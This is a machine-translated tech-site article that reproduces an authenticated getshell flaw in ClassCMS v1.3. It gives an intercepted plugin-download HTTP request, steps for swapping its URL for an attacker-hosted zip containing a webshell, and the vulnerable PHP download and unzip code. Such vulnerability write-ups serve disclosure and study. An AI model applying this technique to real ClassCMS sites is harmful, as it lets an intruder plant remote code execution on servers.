In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-02 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
How to ClassCMS background getshell reproduction, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.
About ClassCMS the official website of ClassCMS: https://classcms.com/ website
ClassCMS is a simple and flexible open source content management system, which can be used to quickly develop a variety of website applications.
Compatible with PHP5.2--PHP8.0, it can be used on APACHE, NGINX and IIS. MySQL SQLite databases are supported by default, and millions of data are supported.
The system has no extra functions, the overall installation package is less than 1m (less than 300KB without editor and Layui), has a perfect and flexible application plug-in mechanism, and common functions can be made into application plug-ins.
The system template language is simple, only need to understand HTML+CSS to make a simple website template.
Background page based on Layui production, adaptive page, in the mobile side also has a good experience.
Through the background model, you can quickly add columns, support unlimited columns, column URL support Chinese.
Has all kinds of input box types, can quickly expand article fields, column variables, user attributes, through the application of plug-ins can also be easily expanded to make all kinds of input boxes.
There is a perfect authority system in the background, which can customize the permissions of each role, customize the columns and input boxes and view and modify permissions.
Black box test reproduction of Getshell in ClassCMS background
ClassCMS downloads the latest version v1.3
After downloading and decompressing the program, the following figure is shown
Set up the environment and start
Configure the configuration
Open App Management-App Store
Click on any app to download
Grab the package when you click to download
Get the return packet
At this time, a plugin download address will be returned.
Continue Forward
POST / admin/?do=shop:downloadClass&ajax=1 HTTP/1.1Host: 192.168.253.1:8013Content-Length: 142Accept: application/json, text/javascript, * / *; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36Content-Type: application/x-www-form-urlencoded Charset=UTF-8Origin: http://192.168.253.1:8013Referer: http://192.168.253.1:8013/admin/?do=shop:index&bread=304%E7%BC%93%E5%AD%98%E6%8F%92%E4%BB%B6&action=detail&classhash=cache304Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: token_43f1a9=53f68d86f94ad3c93551924e77d0e91a; csrf_43f1a9=5f5244ceConnection: closeclasshash=cache304&url=http%3A%2F%2Fclasscms.com%2Fshop%2F%3Faction%3Ddownload%26version%3D1.0%26classhash%3Dcache304%26token%3D&csrf=5f5244ce
Give / admin/?do=shop:downloadClass&ajax=1 POST a plug-in address and plug-in name
Create a new pony and compress it
Upload it to the server and download it, or you can find the place where the file can be uploaded on the website.
Change the URL to the address of the compressed package
Then visit
Http://192.168.253.1:8013/class/cache304/index.php
Pony has been uploaded successfully.
White-box test reproduction of ClassCMS background Getshell
View line 82 of / class/shop/shop.php directly.
The this:download function is called directly
Function download ($url,$filepath) {$curl=curl_init (); curl_setopt ($curl,CURLOPT_URL,$url); if (! $fp = @ fopen ($filepath,'w+')) {Return false;} curl_setopt ($curl,CURLOPT_FILE, $fp); curl_setopt ($curl,CURLOPT_CONNECTTIMEOUT,10); curl_setopt ($curl,CURLOPT_TIMEOUT,300); curl_setopt ($curl,CURLOPT_SSL_VERIFYPEER,FALSE); curl_setopt ($curl,CURLOPT_SSL_VERIFYHOST,FALSE); $info=curl_exec ($curl); $httpinfo=curl_getinfo ($curl) Curl_close ($curl); fclose ($fp); if ($httpinfo ['http_code'] > = 300) {@ unlink ($filepath); Return false;} Return $info;}}
And then to line 92.
If (C ('cms:class:unzip',$classfile,$classdir)) {@ unlink ($classfile); if (C (' cms:class:refresh',$classhash)) {echo (array ('msg'= > "download completed, please install this application in the application management page")); Return;} else {echo (array (' msg'= > "installation package format error, Please try again, 'error'= > 1)); Return;} else {@ unlink ($classfile)) Echo (array ('msg'= > "failed to extract the installation package, please try again",' error'= > 1)); Return;}
Called the unzip method under / cms/class.php
Function unzip ($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true) {if ('ZipArchive')) {$zip = new ZipArchive;if ($zip- > open ($src_file) = TRUE) {if (@ $zip- > extractTo ($dest_dir)) {$zip- > close (); Return true;} $zip- > close ();} elseif (function_exists (' zip_open')) {if (! cms_createdir ($dest_dir)) {Return false } if ($zip = zip_open ($src_file)) {if ($zip) {if ($create_zip_name_dir) {$splitter='.';} else {$splitter='/';} if ($dest_dir = false) {$dest_dir = substr ($src_file, 0, strrpos ($src_file, $splitter). "/";} while ($zip_entry = @ zip_read ($zip)) {$pos_last_slash = strrpos (zip_entry_name ($zip_entry), "/") If ($pos_last_slash! = = false) {cms_createdir ($dest_dir.substr (zip_entry_name ($zip_entry), 0, $pos_last_slash+1);} if (zip_entry_open ($zip,$zip_entry, "r")) {$file_name = $dest_dir.zip_entry_name ($zip_entry); if ($overwrite = true | | $overwrite = = false & &! is_file ($file_name)) {$fstream = zip_entry_read ($zip_entry, zip_entry_filesize ($zip_entry)) @ file_put_contents ($file_name, $fstream);} zip_entry_close ($zip_entry);} @ zip_close ($zip);} Return true;}} Return false;}
The downloaded file will be decompressed directly to form the background getshell.
Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.